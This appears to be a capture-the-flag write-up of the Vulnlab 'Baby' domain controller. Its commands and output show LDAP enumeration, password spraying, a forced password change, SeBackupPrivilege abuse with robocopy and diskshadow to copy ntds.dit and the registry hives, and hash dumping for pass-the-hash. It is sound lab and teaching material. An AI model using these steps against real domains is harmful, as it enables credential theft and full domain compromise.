Baby - VL
Baby - VL
Baby - Pretty Little Baby
Baby is a simple, nice, easy machine. The LDAP has anonymous access, and a password is left in the description of a user. The password works for another user but needs to be changed. Upon changing the password, I can use WinRM and discover that this user is a server backup operator. I’ll use Robocopy to copy the flag and copy the registry hives along side diskshadow the drive to retrieve ntds.dit to my machine to dump hashes.
Recon
Nmap
As always, I’ll start off with nmap:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-09-22 06:14:20Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: baby.vl0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
3389/tcp open ms-wbt-server Microsoft Terminal Services
| rdp-ntlm-info:
| Target_Name: BABY
| NetBIOS_Domain_Name: BABY
| NetBIOS_Computer_Name: BABYDC
| DNS_Domain_Name: baby.vl
| DNS_Computer_Name: BabyDC.baby.vl
| DNS_Tree_Name: baby.vl
| Product_Version: 10.0.20348
|_ System_Time: 2025-09-22T06:14:27+00:00
|_ssl-date: 2025-09-22T06:15:06+00:00; +1s from scanner time.
| ssl-cert: Subject: commonName=BabyDC.baby.vl
| Not valid before: 2025-08-18T12:14:43
|_Not valid after: 2026-02-17T12:14:43
Service Info: Host: BABYDC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: 1s, deviation: 0s, median: 0s
| smb2-time:
| date: 2025-09-22T06:14:31
|_ start_date: N/A
Typical DC, I have the FQDN but I’ll rather generate with netexec.
1
2
3
4
5
➜ Baby netexec smb 10.129.234.71 --generate-hosts-file hostz
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
➜ Baby cat hostz | sudo tee -a /etc/hosts
[sudo] password for simon:
10.129.234.71 BABYDC.baby.vl baby.vl BABYDC
SMB
No smb guest access.
1
2
3
➜ Baby netexec smb 10.129.234.71 -u 'tryit' -p ''
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\tryit: STATUS_LOGON_FAILURE
LDAP
But LDAP does allow anonymous access.
1
2
3
➜ Baby netexec ldap 10.129.234.71 -u '' -p ''
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [+] baby.vl\:
Adding --users flag shows -Description- of the users, like a note left or password in case.
1
2
3
4
5
6
7
8
9
10
11
12
13
➜ Baby netexec ldap 10.129.234.71 -u '' -p '' --users
<SNIP>
LDAP 10.129.234.71 389 BABYDC [*] Enumerated 9 domain users: baby.vl
LDAP 10.129.234.71 389 BABYDC -Username- -Last PW Set- -BadPW- -Description-
LDAP 10.129.234.71 389 BABYDC Guest <never> 0 Built-in account for guest access to the computer/domain
LDAP 10.129.234.71 389 BABYDC Jacqueline.Barnett 2021-11-21 15:11:03 0
LDAP 10.129.234.71 389 BABYDC Ashley.Webb 2021-11-21 15:11:03 0
LDAP 10.129.234.71 389 BABYDC Hugh.George 2021-11-21 15:11:03 0
LDAP 10.129.234.71 389 BABYDC Leonard.Dyer 2021-11-21 15:11:03 0
LDAP 10.129.234.71 389 BABYDC Connor.Wilkinson 2021-11-21 15:11:08 0
LDAP 10.129.234.71 389 BABYDC Joseph.Hughes 2021-11-21 15:11:08 0
LDAP 10.129.234.71 389 BABYDC Kerry.Wilson 2021-11-21 15:11:08 0
LDAP 10.129.234.71 389 BABYDC Teresa.Bell 2021-11-21 15:14:37 0 Set initial password to BabyStart123!
This can be done via ldapsearch too.
1
2
3
4
➜ Baby ldapsearch -x -H ldap://10.129.234.71 -b "dc=baby,dc=vl" "(objectClass=*)" | grep description
<SNIP>
description: Set initial password to BabyStart123!
Shell as Caroline.Robinson
User Teresa.Bell does have initial password set to BabyStart123!. But the password doesn’t work for this account.
1
2
3
4
5
6
➜ Baby netexec ldap 10.129.234.71 -u 'Teresa.Bell' -p 'BabyStart123!'
LDAP 10.129.234.71 389 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl) (signing:None) (channel binding:No TLS cert)
LDAP 10.129.234.71 389 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123!
➜ Baby netexec smb 10.129.234.71 -u 'Teresa.Bell' -p 'BabyStart123!'
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
Password Spraying
I’ll perform a password spray against the user list to check if any other accounts use the password BabyStart123!.
1
2
3
4
5
6
7
8
9
10
➜ Baby cat users.txt
Jacqueline.Barnett
Ashley.Webb
Hugh.George
Leonard.Dyer
Connor.Wilkinson
Joseph.Hughes
Kerry.Wilson
Teresa.Bell
Caroline.Robinson
1
2
3
4
5
6
7
8
9
10
11
➜ Baby netexec smb 10.129.234.71 -u users.txt -p 'BabyStart123!'
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Jacqueline.Barnett:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Ashley.Webb:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Hugh.George:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Leonard.Dyer:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Connor.Wilkinson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Joseph.Hughes:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Kerry.Wilson:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Teresa.Bell:BabyStart123! STATUS_LOGON_FAILURE
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
Changing Password
This password only worked for Caroline.Robinson, but it returned STATUS_PASSWORD_MUST_CHANGE. Which means I need to change the password, which can be done using netexec.
1
2
3
4
➜ Baby netexec smb 10.129.234.71 -u 'Caroline.Robinson' -p 'BabyStart123!' -M change-password -o NEWPASS=NewPass123!
SMB 10.129.234.71 445 BABYDC [*] Windows Server 2022 Build 20348 x64 (name:BABYDC) (domain:baby.vl) (signing:True) (SMBv1:False) (Null Auth:True)
SMB 10.129.234.71 445 BABYDC [-] baby.vl\Caroline.Robinson:BabyStart123! STATUS_PASSWORD_MUST_CHANGE
CHANGE-P... 10.129.234.71 445 BABYDC [+] Successfully changed password for Caroline.Robinson
Caroline.Robinson can WinRM onto the box.
1
2
3
➜ Baby netexec winrm 10.129.234.71 -u 'Caroline.Robinson' -p 'NewPass123!'
WINRM 10.129.234.71 5985 BABYDC [*] Windows Server 2022 Build 20348 (name:BABYDC) (domain:baby.vl)
WINRM 10.129.234.71 5985 BABYDC [+] baby.vl\Caroline.Robinson:NewPass123! (Pwn3d!)
I can grab user.txt.
1
2
3
4
5
6
7
8
9
10
➜ Baby evil-winrm-py -i 10.129.234.71 -u 'Caroline.Robinson' -p 'NewPass123!'
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.4.1
[*] Connecting to '10.129.234.71:5985' as 'Caroline.Robinson'
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> type ..\Desktop\user.txt
d63d5751c0f9..............
Shell as Administrator
This user has Two interesting privileges.
1
2
3
4
5
6
7
8
9
10
11
12
13
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
First one is SeBackupPrivilege and the second one is SeRestorePrivilege.
I’ll abuse SeBackupPrivilege to read root.txt and copy the Registry Hives to my VM to dump hashes.
Root.txt
To read any file, I can make a backup of it and then read it out using this one-liner:
1
PS > mkdir c:/xf; robocopy /b C:\users\administrator\desktop C:\xf; cat c:/xf/root.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> mkdir c:/xf; robocopy /b C:\users\administrator\desktop C:\xf; cat c:/xf/root.txt
Directory: C:\
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 9/22/2025 6:40 AM xf
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, September 22, 2025 6:40:00 AM
Source : C:\users\administrator\desktop\
Dest : C:\xf\
Files : *.*
Options : *.* /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
2 C:\users\administrator\desktop\
New File 282 desktop.ini
0%
100%
New File 34 root.txt
0%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 2 2 0 0 0 0
Bytes : 316 316 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Ended : Monday, September 22, 2025 6:40:00 AM
4300b177dea030a........... <= root.txt
Shell
To get Administrator shell, I’ll make backup of SAM and SYSTEM.
1
cmd /c "reg save HKLM\SAM SAM"
1
2
3
evil-winrm-py PS C:\Users\Caroline.Robinson\Documents> download SAM .
Downloading C:\Users\Caroline.Robinson\Documents\SAM: 64.0kB [00:00, 205MB/s]
[+] File downloaded successfully and saved as: /vulnlab/Baby/SAM
I can now dump it using pypykatz localy.
1
2
3
4
5
6
7
8
9
10
11
12
➜ Baby pypykatz registry --sam SAM SYSTEM
WARNING:pypykatz:SECURITY hive path not supplied! Parsing SECURITY will not work
WARNING:pypykatz:SOFTWARE hive path not supplied! Parsing SOFTWARE will not work
============== SYSTEM hive secrets ==============
CurrentControlSet: ControlSet001
Boot Key: 191d5d3fd5b0b51888453de8541d7e88
============== SAM hive secrets ==============
HBoot Key: 7e9695903f4da13d607d9b8d32b81d4d10101010101010101010101010101010
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Fail
But I cannot connect with this hash, since it’s local administrator’s hash.
1
2
3
4
5
6
7
8
9
➜ Baby evil-winrm-py -i 10.129.234.71 -u Administrator -H 8d992faed38128ae85e95fa35868bb43
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.4.1
[*] Connecting to '10.129.234.71:5985' as 'Administrator'
[-] Failed to authenticate the user Administrator with ntlm
Success
For DA, I’ll need to backup ntds.dit file somehow and dump hashes again. For that, I can use this script to diskshadow.
1
2
3
4
5
6
7
8
9
➜ Baby cat script.txt
set metadata C:\Windows\Temp\sweet.cabX
set context clientaccessibleX
set context persistentX
begin backupX
add volume C: alias cdriveX
createX
expose %cdrive% E:X
end backupX
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
evil-winrm-py PS C:\Programdata> upload script.txt .
Uploading /vulnlab/Baby/script.txt: 100%|███████████████████████████████████████████| 176/176 [00:00<00:00, 700B/s]
[+] File uploaded successfully as: C:\Programdata\script.txt
evil-winrm-py PS C:\Programdata> diskshadow /s script.txt
Microsoft DiskShadow version 1.0
Copyright (C) 2013 Microsoft Corporation
On computer: BABYDC, 9/22/2025 7:01:08 AM
-> set metadata C:\Windows\Temp\sweet.cab
-> set context clientaccessible
-> set context persistent
-> begin backup
-> add volume C: alias cdrive
-> create
Alias cdrive for shadow ID {654f8bd7-71c9-4896-83ed-b73340102ea9} set as environment variable.
Alias VSS_SHADOW_SET for shadow set ID {8b9f2f67-e837-425d-bcd3-2efefb8a7d99} set as environment variable.
Querying all shadow copies with the shadow copy set ID {8b9f2f67-e837-425d-bcd3-2efefb8a7d99}
* Shadow copy ID = {654f8bd7-71c9-4896-83ed-b73340102ea9} %cdrive%
- Shadow copy set: {8b9f2f67-e837-425d-bcd3-2efefb8a7d99} %VSS_SHADOW_SET%
- Original count of shadow copies = 1
- Original volume name: \\?\Volume{711fc68a-0000-0000-0000-100000000000}\ [C:\]
- Creation time: 9/22/2025 7:01:27 AM
- Shadow copy device name: \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1
- Originating machine: BabyDC.baby.vl
- Service machine: BabyDC.baby.vl
- Not exposed
- Provider ID: {b5946137-7b9f-4925-af80-51abd60b20d5}
- Attributes: No_Auto_Release Persistent Differential
Number of shadow copies listed: 1
-> expose %cdrive% E:
-> %cdrive% = {654f8bd7-71c9-4896-83ed-b73340102ea9}
The shadow copy was successfully exposed as E:\.
-> end backup
->
evil-winrm-py PS C:\Programdata> robocopy /b E:\Windows\ntds . ntds.dit
-------------------------------------------------------------------------------
ROBOCOPY :: Robust File Copy for Windows
-------------------------------------------------------------------------------
Started : Monday, September 22, 2025 7:01:46 AM
Source : E:\Windows\ntds\
Dest : C:\Programdata\
Files : ntds.dit
Options : /DCOPY:DA /COPY:DAT /B /R:1000000 /W:30
------------------------------------------------------------------------------
1 E:\Windows\ntds\
New File 16.0 m ntds.dit
<SNIP>
100%
100%
------------------------------------------------------------------------------
Total Copied Skipped Mismatch FAILED Extras
Dirs : 1 0 1 0 0 0
Files : 1 1 0 0 0 0
Bytes : 16.00 m 16.00 m 0 0 0 0
Times : 0:00:00 0:00:00 0:00:00 0:00:00
Speed : 178,481,021 Bytes/sec.
Speed : 10,212.766 MegaBytes/min.
Ended : Monday, September 22, 2025 7:01:46 AM
evil-winrm-py PS C:\Programdata> download ntds.dit
[-] Usage: download <remote_path> <local_path>
evil-winrm-py PS C:\Programdata> download ntds.dit .
[+] File downloaded successfully and saved as: /vulnlab/Baby/ntds.dit
Now I can dump the hashes with impacket-secretsdump.
1
2
3
4
5
6
7
8
9
10
➜ Baby impacket-secretsdump -ntds ntds.dit -system SYSTEM -sam SAM LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra
[*] Target system bootKey: 0x191d5d3fd5b0b51888453de8541d7e88
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8d992faed38128ae85e95fa35868bb43:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
<SNIP>
[*] Cleaning up...
I can now grab the root.txt.
1
2
3
4
5
6
7
8
9
10
➜ Baby evil-winrm-py -i 10.129.234.71 -u Administrator -H ee4457ae59f1e3fbd764e33d9cef123d
_ _ _
_____ _(_| |_____ __ _(_)_ _ _ _ _ __ ___ _ __ _ _
/ -_\ V | | |___\ V V | | ' \| '_| ' |___| '_ | || |
\___|\_/|_|_| \_/\_/|_|_||_|_| |_|_|_| | .__/\_, |
|_| |__/ v1.4.1
[*] Connecting to '10.129.234.71:5985' as 'Administrator'
evil-winrm-py PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
4300b177dea030a9c.......
Thanks for reading the writeup.
This post is licensed under
CC BY 4.0
by the author.